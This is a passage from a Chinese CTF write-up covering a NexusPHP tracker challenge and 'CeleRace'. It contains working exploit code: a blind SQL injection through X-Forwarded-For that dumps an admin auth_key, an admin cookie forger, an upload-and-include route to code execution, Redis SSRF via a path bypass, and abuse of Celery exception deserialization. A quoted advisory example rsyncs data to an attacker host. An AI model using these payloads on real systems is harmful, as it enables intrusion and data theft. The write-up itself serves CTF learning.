foreach (array("passkey","info_hash","peer_id","event") as $x)
{
if(isset($_GET[$x]))
$GLOBALS[$x] = $_GET[$x];
}
// get integer type port, downloaded, uploaded, left from client
foreach (array("port","downloaded","uploaded","left","compact","no_peer_id") as $x)
{
$GLOBALS[$x] = intval($_GET[$x] ?? 0);
}
//check info_hash, peer_id and passkey
foreach (array("info_hash","peer_id","port","downloaded","uploaded","left") as $x)
if (!isset($GLOBALS[$x])) warn("Missing key: $x");
foreach (array("info_hash","peer_id") as $x)
if (strlen($GLOBALS[$x]) != 20) warn("Invalid $x (" . strlen($GLOBALS[$x]) . " - " . rawurlencode($GLOBALS[$x]) . ")");
if (isset($passkey) && strlen($passkey) != 32) warn("Invalid passkey (" . strlen($passkey) . " - $passkey)");

主要满足:

1
array("passkey","info_hash","peer_id","event")

1
array("info_hash","peer_id","port","downloaded","uploaded","left")

里面的所有参数传入,并且info_hash和passkey必须正确,info_hash是已经在平台上存在的种子hash,在详情页面可以看到,passkey则是用户控制面板的密钥。

漏洞点在413行,明显存在SQL注入

1
$sameIPRecord = mysql_fetch_assoc(sql_query("select id from peers where torrent = $torrentid and userid = $userid and ip = '$ip' limit 1"));

追溯一下获取$ip的地方

1
2
3
4
5
//4. GET IP AND CHECK PORT
$ip = getip(); // avoid to get the spoof ip from some agent
$_GET['ip'] = $ip;
if (!$port || $port > 0xffff)
warn("invalid port");
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
function getip($real = true) {
if (isset($_SERVER)) {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && validip($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_CLIENT_IP']) && validip($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} else {
$ip = $_SERVER['REMOTE_ADDR'] ?? '';
}
} else {
if (getenv('HTTP_X_FORWARDED_FOR') && validip(getenv('HTTP_X_FORWARDED_FOR'))) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('HTTP_CLIENT_IP') && validip(getenv('HTTP_CLIENT_IP'))) {
$ip = getenv('HTTP_CLIENT_IP');
} else {
$ip = getenv('REMOTE_ADDR') ?? '';
}
}
$ip = trim(trim($ip), ",");
if ($real && str_contains($ip, ",")) {
return strstr($ip, ",", true);
}
return $ip;
}

明显是可以通过XFF伪造的,因此可以构造exp进行注入,要注意的是会判断Host是否包含在$trackerUrl,所以要改一下host,平台上是pter.qwb.local

1
2
3
4
5
$currentUrl = getSchemeAndHttpHost();
if (!str_contains($trackerUrl, $currentUrl)) {
do_log("announce check tracker url, trackerUrl: $trackerUrl does not contains: $currentUrl");
warn("you should announce to: $trackerUrl");
}

盲注获取auth_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from time import sleep
import requests

passkey = "0ef547977bb67b8fdf34dbba8ac28efa"
session = "eyJpdiI6IktZcWF2WktzYmNhaXB3OE56Vzg2MWc9PSIsInZhbHVlIjoiWjZ0N3JSRnN4VGJJVEZHVnk2bnV6MmdlOXhpdXFwWlpaanhzUmJLU0lzMnVHSmsrOWlSNyswVFI1dmtNWWdDWHUydElrRHZkVWluODBlQmNmTGlBMEhGd2hUeXpLdS9ETnFFM3Y5dDBDa29DRVdzaEJFTGlpdHB6ZjlWVlhITUMiLCJtYWMiOiJlYjM4MWU3NTc2MTZiY2Y2NGZkNmQ2ZmYyYjQ0ZjQ3ZWI4NjgxMmU1NWE3NzcyYTBhZTA4ZWQ5ODA2NzZjM2IzIiwidGFnIjoiIn0="
url = "http://xxx/"
sess = requests.Session()
sess.cookies.set("c_secure_pass", session)

def announce(data):
sleep(5)
u = url + "announce.php"
payload = f"' or exp(710-( {data} )) and '"
r = sess.post(u, params={"info_hash": bytes.fromhex("2cefbfbd6a5f5227efbfbdefbfbd6befbfbd4aef"), "peer_id": bytes.fromhex("2cefbfbd6a5f5227efbfbdefbfbd6befbfbd4aef"), "port":"80", "downloaded": "1", "uploaded": "1", "left": "1", "passkey": passkey, "event": "stopped"}, headers={"User-Agent": "uTorrent/3000", "X-FORWARDED-FOR": payload, "Host": "pter.qwb.local"})
if r.status_code == 200:
return True
return False
def sqli1():
ans = ""
for i in range(33):
chars = '1234567890abcdef-'
for char in chars:
if char == "-":
exit(0)
payload = f"select length(auth_key) from users where auth_key like '{ans}{char}%' and id=1 union select 0 limit 1"
if announce(payload):
ans += char
print(ans)
break
sqli1()

app/Auth/NexusWebUserProvider.php->validateCredentials中有如下验证cookie代码:

1
2
3
4
5
6
public function validateCredentials(Authenticatable $user, array $credentials)
{
list($tokenJson, $signature) = explode('.', base64_decode($credentials["c_secure_pass"]));
$expectedSignature = hash_hmac('sha256', $tokenJson, $user->auth_key);
return hash_equals($expectedSignature, $signature);
}

因此获取到admin的auth_key之后可以进行伪造

1
2
3
4
5
<?php
$data = json_encode(array("user_id" => "1","expires" => 1992307586));

$s = hash_hmac('sha256', $data, "73ec97f74152abca89d44ec21be2e46b54b86947");
echo base64_encode($data . "." . $s);

尝试登录成功,管理员的站点设置中可以允许上传php,但是题目中貌似把public下的写权限全部去除了
alt text

因此找到另一处文件包含点public/page.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
require "../include/bittorrent.php";

if (!empty($_REQUEST['view'])) {
$view = trim($_REQUEST['view'], "/.");
$view = str_replace(".", "/", $view);
if (!empty($_REQUEST['plugin'])) {
$pluginId = $_REQUEST['plugin'];
$plugin = \Nexus\Plugin\Plugin::getById($pluginId);
$viewFile = $plugin->getNexusView($view);
} else {
$viewFile = ROOT_PATH . "resources/views/$view";
}

if (!str_ends_with($viewFile, ".php")) {
$viewFile .= ".php";
}
if (file_exists($viewFile)) {
require $viewFile;
} else {
$msg = "viewFile: $viewFile not exists, _REQUEST: " . json_encode($_REQUEST);
do_log($msg, "error");
throw new \RuntimeException($msg);
}
} else {
$msg = "require view parameter, _REQUEST: " . json_encode($_REQUEST);
do_log($msg, "error");
throw new \RuntimeException($msg);
}

直接把附件目录改到该目录下
alt text

然后到任意一处编辑框进行文件上传
alt text

通过文件包含点爆破即可,文件名格式: [日期(精确到秒)][文件md5].php
alt text

日志系统

https://mp.weixin.qq.com/s/oHrFdG0vvHKNlWguUWVXAA

anime

https://psdat123.github.io/posts/HCMUS-CTF-2025/

CeleRace

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
from __future__ import annotations

import mimetypes
from pathlib import Path

from framework import MiniFlask, jsonify, request, session, save_session

from . import auth
from .tasks import celery_app

STATIC_DIR = (Path(__file__).resolve().parent.parent / "static").resolve()

app = MiniFlask(__name__)


def require_login(next_handler):
def wrapper(**kwargs):
if not session.get("user"):
return jsonify({"error": "login required"}, status=403)
return next_handler(**kwargs)

return wrapper


def require_admin(next_handler):
def wrapper(**kwargs):
if session.get("role") != "admin":
return jsonify({"error": "admin only"}, status=403)
return next_handler(**kwargs)

return wrapper


@app.before_request
def load_user() -> None:
username = session.get("user")
if username:
request.user = username
request.role = session.get("role", "user")
else:
request.user = "guest"
request.role = "guest"


@app.after_request
def ensure_cookie(response):
response.headers.setdefault("X-App", "MiniWSGI")
return response

def _static_response(path: Path):
from werkzeug.exceptions import NotFound

if not path.exists() or not path.is_file():
raise NotFound()
mimetype, _ = mimetypes.guess_type(str(path))
with path.open("rb") as fh:
data = fh.read()
return app.response_class(data, mimetype=mimetype or "application/octet-stream")


@app.get("/")
def frontend():
return _static_response(STATIC_DIR / "index.html")


@app.get("/static/app.js")
def static_app_js():
return _static_response(STATIC_DIR / "app.js")


@app.get("/static/style.css")
def static_style_css():
return _static_response(STATIC_DIR / "style.css")


@app.get("/api/info")
def api_info():
return jsonify({"message": "MiniWSGI Task Board", "user": request.user})


@app.post("/register")
def register():
data = request.get_json(silent=True) or {}
try:
auth.register(data.get("username", ""), data.get("password", ""))
save_session()
except auth.AuthError as exc:
return jsonify({"error": str(exc)}), 400
return jsonify({"message": "registered", "user": auth.current_user()})


@app.post("/login")
def login():
data = request.get_json(silent=True) or {}
try:
auth.authenticate(data.get("username", ""), data.get("password", ""))
save_session()
except auth.AuthError as exc:
return jsonify({"error": str(exc)}), 401
return jsonify({"message": "logged in", "user": auth.current_user()})


@app.post("/logout")
def logout():
auth.logout()
save_session()
return jsonify({"message": "logged out"})


@app.get("/session")
def session_info():
return jsonify({"user": session.get("user", "guest"), "role": session.get("role", "guest")})


def _queue(task_name: str, **kwargs):
result = celery_app.send_task(task_name, kwargs=kwargs)
return jsonify({"task_id": result.id, "task": task_name})


@app.post("/tasks/echo")
def queue_echo():
data = request.get_json(silent=True) or {}
message = data.get("message", "")
return _queue("miniws.echo", message=message)


@app.post("/tasks/fetch", middlewares=[require_admin])
def queue_fetch_root():
return queue_fetch("")


@app.post("/tasks/fetch/<path:target>", middlewares=[require_admin])
def queue_fetch(target: str):
payload = request.get_json(silent=True) or {}
url = payload.get("url") or target
verb = payload.get("verb", "GET")
if not url:
return jsonify({"error": "url required"}, status=400)
host_header = payload.get("host")
body = payload.get("body")
return _queue("miniws.fetch", url=url, host_header=host_header, body=body, verb=verb)



@app.get("/tasks/result")
def task_result():
task_id = request.args.get("id")
if not task_id:
return jsonify({"error": "task id required"}, status=400)
result = celery_app.AsyncResult(task_id)
if not result.ready():
return jsonify({"state": result.state})
return jsonify({"state": result.state, "result": result.result})


if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)

漏洞点在于以下这个路由可以SSRF,但是有一个鉴权中间件

1
2
3
4
5
6
7
8
9
10
@app.post("/tasks/fetch/<path:target>", middlewares=[require_admin])
def queue_fetch(target: str):
payload = request.get_json(silent=True) or {}
url = payload.get("url") or target
verb = payload.get("verb", "GET")
if not url:
return jsonify({"error": "url required"}, status=400)
host_header = payload.get("host")
body = payload.get("body")
return _queue("miniws.fetch", url=url, host_header=host_header, body=body, verb=verb)

auth.py里面可以看到正常注册的用户都是user身份,所以要想办法绕过这个中间件鉴权。

整个flask应用实际来源于一个MiniFlask类,在framework/app.py中定义

1
app = MiniFlask(__name__)

绕过 require_admin 中间件后,就可以直接请求 queue_fetch 接口。
tasks.py里可以看到miniws.fetch这个任务实际上就是自定义了一个请求包然后发送

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
parsed = urlparse(url)
host = parsed.hostname or settings.redis_host
port = parsed.port or (443 if parsed.scheme == "https" else 80)
path = parsed.path or "/"
if parsed.query:
path = f"{path}?{parsed.query}"

request_host = host_header or parsed.netloc or f"{host}:{port}"
request_body = body.encode() if body else b""

payload = (
f"{verb} {path} HTTP/1.1\r\n"
f"Host: {request_host}\r\n"
"User-Agent: MiniFetch/1.0\r\n"
"Connection: close\r\n"
"\r\n"
).encode() + request_body

chunks: list[bytes] = []
with socket.create_connection((host, port), timeout=5) as sock:
sock.sendall(payload)
while True:
data = sock.recv(4096)
if not data:
break
chunks.append(data)
preview = b"".join(chunks)[:2048]
return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}

fetch_task 直接将用户输入拼接进了请求体中,只需将 url 设置为 http://127.0.0.1:6379,通过控制 verb 即可与本机 Redis 服务交互,例如设置 verb 为 info\r\nquit\r\n。由于 Redis 存在未授权访问,可读取或修改 Redis 内数据,理论上可以随意创建 Celery 消息,也可以伪造任务的执行结果。
redis.acl

1
user default on nopass ~* &* +@all -SAVE -SLAVEOF -MODULE -CONFIG -MONITOR -CLIENT

redis_ssrf.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import time
import requests

TARGET = "http://localhost:5001"

def api_post(path: str, json_body: dict, cookies: dict | None = None) -> dict:
r = requests.post(
f"{TARGET}{path}", json=json_body, cookies=cookies or {}, timeout=5
)
r.raise_for_status()
return r.json()


def api_get(path: str, cookies: dict | None = None) -> dict:
r = requests.get(f"{TARGET}{path}", cookies=cookies or {}, timeout=5)
r.raise_for_status()
return r.json()


def queue_fetch_via_bypass(
url: str, host: str | None = None, body: str | None = None, verb: str = "POST"
) -> str:
bypass_path = "/tasks/fetch/%252e%252e/%252e%252e/x"
payload = {"url": url, "verb": verb}
if host is not None:
payload["host"] = host
if body is not None:
payload["body"] = body
task = api_post(bypass_path, payload)
task_id = task["task_id"]
for _ in range(30):
res = api_get(f"/tasks/result?id={task_id}")
print(res)
if res.get("state") == "SUCCESS":
preview = res.get("result", {}).get("preview", "")
print("[+] fetch preview bytes:", res.get("result", {}).get("bytes"))
return preview
time.sleep(0.2)
raise RuntimeError("fetch task timeout")

queue_fetch_via_bypass(
"http://127.0.0.1:6379/",
"127.0.0.1",
"",
"info\r\nquit\r\n",
)

搜索 Celery 历史漏洞,发现 CVE-2021-23727,虽然当前版本已经修复,但只是要求 exc_type 必须为 Exception。正好发现 framework.app 里面有一个奇怪的 DiagnosticsPersistError,其他地方根本没有使用到,在 /tmp/debug 存在的情况下实例化该对象就可以往任意路径写入文件。

1
当任务失败时,失败信息会在后台进行序列化。在某些情况下,异常类只能从使用者的代码库中导入。在这种情况下,我们会重建异常类,以便在查询任务结果的进程中重新抛出错误。这在 #4836 中引入。如果重建的异常类型不是一个异常,这就是一个安全问题。如果未包含本补丁中的条件,攻击者可能通过在结果后端将任务结果设置为失败,并将 os 模块、system 函数作为异常类型,以及 payload rsync /data attacker@192.168.56.100:~/data 作为异常参数,从而注入远程代码执行指令,例如:json { "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data attacker@192.168.56.100:~/data" }根据我的分析,这个漏洞只有在生产者延迟了一个任务且该任务运行时间足够长以至于攻击者可以在执行过程中更改结果,并且生产者已轮询该任务的结果时才可能被利用。攻击者还必须获得结果后端的访问权限。该安全漏洞的严重性较低,但我们仍建议进行升级。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
class DiagnosticsPersistError(RuntimeError):
"""Dormant exception used for development-time diagnostics persistence."""

_BASE_DIR = Path(os.environ.get("FRAMEWORK_DIAGNOSTICS_DIR", "/app/data")).resolve()
_DEBUG_SENTINEL = Path("/tmp/debug")

def __init__(self, payload: str, *args: Any, **kwargs: Any) -> None:
if self._DEBUG_SENTINEL.exists():
self._maybe_persist(payload)
super().__init__("diagnostics capture failed", *args, **kwargs)

def _maybe_persist(self, payload: str) -> None:
info = self._decode_payload(payload)
if not info:
return

target = info.get("path")
if not target:
return

path = Path(target)
mode = str(info.get("mode", "w"))
encoding = info.get("encoding", "utf-8")
data = info.get("content", "")

try:
path.parent.mkdir(parents=True, exist_ok=True)
if "b" in mode:
blob = self._ensure_bytes(data, encoding)
with path.open(mode) as fh: # type: ignore[call-arg]
fh.write(blob)
else:
text = self._ensure_text(data, encoding)
with path.open(mode, encoding=encoding) as fh:
fh.write(text)
except Exception:
return

def _decode_payload(self, payload: str) -> Dict[str, Any] | None:
attempts = [payload]
try:
attempts.append(bytes.fromhex(payload).decode("utf-8"))
except Exception:
pass

for candidate in attempts:
try:
return json.loads(candidate)
except Exception:
continue
return None

def _ensure_bytes(self, data: Any, encoding: str) -> bytes:
if isinstance(data, bytes):
return data
if isinstance(data, str):
if encoding == "base64":
return base64.b64decode(data)
return data.encode(encoding)
return bytes(data)

def _ensure_text(self, data: Any, encoding: str) -> str:
if isinstance(data, str):
if encoding == "base64":
return base64.b64decode(data).decode("utf-8", errors="ignore")
return data
if isinstance(data, bytes):
return data.decode(encoding, errors="ignore")
return str(data)

于是可以往 Redis 里面写入一个任务的执行结果,status 设置为 FAILURE,result 如下设置:

1
2
3
4
5
6
7
8
9
10
{
"exc_type": "DiagnosticsPersistError",
"exc_message": json.dumps(
{
"path": "/tmp/test",
"content": "123",
}
),
"exc_module": "framework.app",
}

通过 task_result 接口查询该任务的执行结果时,DiagnosticsPersistError 就会被实例化,在 /tmp/debug 存在的情况下,/tmp/test 会被写入 123

接着需要解决的问题是如何创建 /tmp/debug

注意到框架处理 Session 时存在目录穿越漏洞,当 sid 中存在 ../ 时,Session 文件会从 self.directory 中穿越出去,由此可以创建 /tmp/debug

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
class FileSessionManager:
"""Manage loading and storing of file-based sessions."""

def __init__(self, secret: str = "devsecret", directory: str = "/tmp/sess", cookie_name: str = "mini_session", nonce_bytes: int = 8) -> None:
self.secret = secret.encode() if isinstance(secret, str) else secret
self.directory = directory
self.cookie_name = cookie_name
self.nonce_bytes = nonce_bytes
os.makedirs(self.directory, exist_ok=True)

# -- public API -----------------------------------------------------
def load_session(self, request: Request) -> FileSession:
sid, created = self._get_or_create_sid(request)
data = self._read(sid) or {}
session = FileSession(self, sid, sid, data=data, new=not bool(data))
session.cookie_needs_update = created
return session

def save(self, session: FileSession) -> None:
if not session.modified:
return
path = self._session_path(session.sid)
tmp_path = f"{path}.tmp-{secrets.token_hex(4)}"
payload = {key: value for key, value in session.items()}
with open(tmp_path, "w", encoding="utf-8") as fh:
json.dump(payload, fh, ensure_ascii=False, separators=(",", ":"))
os.replace(tmp_path, path)
session.modified = False

def get_cookie_value(self, session: FileSession) -> str:
return session.nonce

# -- internal helpers ----------------------------------------------
def _get_or_create_sid(self, request: Request) -> tuple[str, bool]:
raw = request.cookies.get(self.cookie_name)
if raw:
sid = self._normalize_sid(raw)
if sid:
return sid, False
sid = secrets.token_hex(self.nonce_bytes)
return sid, True

def _normalize_sid(self, value: str) -> str | None:
sid = value.strip()
if not sid:
return None
if len(sid) > 256:
sid = sid[:256]
return sid

def _read(self, sid: str) -> Optional[Dict[str, Any]]:
path = self._session_path(sid)
try:
with open(path, "r", encoding="utf-8") as fh:
return json.load(fh)
except FileNotFoundError:
return None
except json.JSONDecodeError:
return None

def _session_path(self, sid: str) -> str:
return os.path.join(self.directory, f"{sid}")

http://gensokyo.cn/2025/10/19/celerace/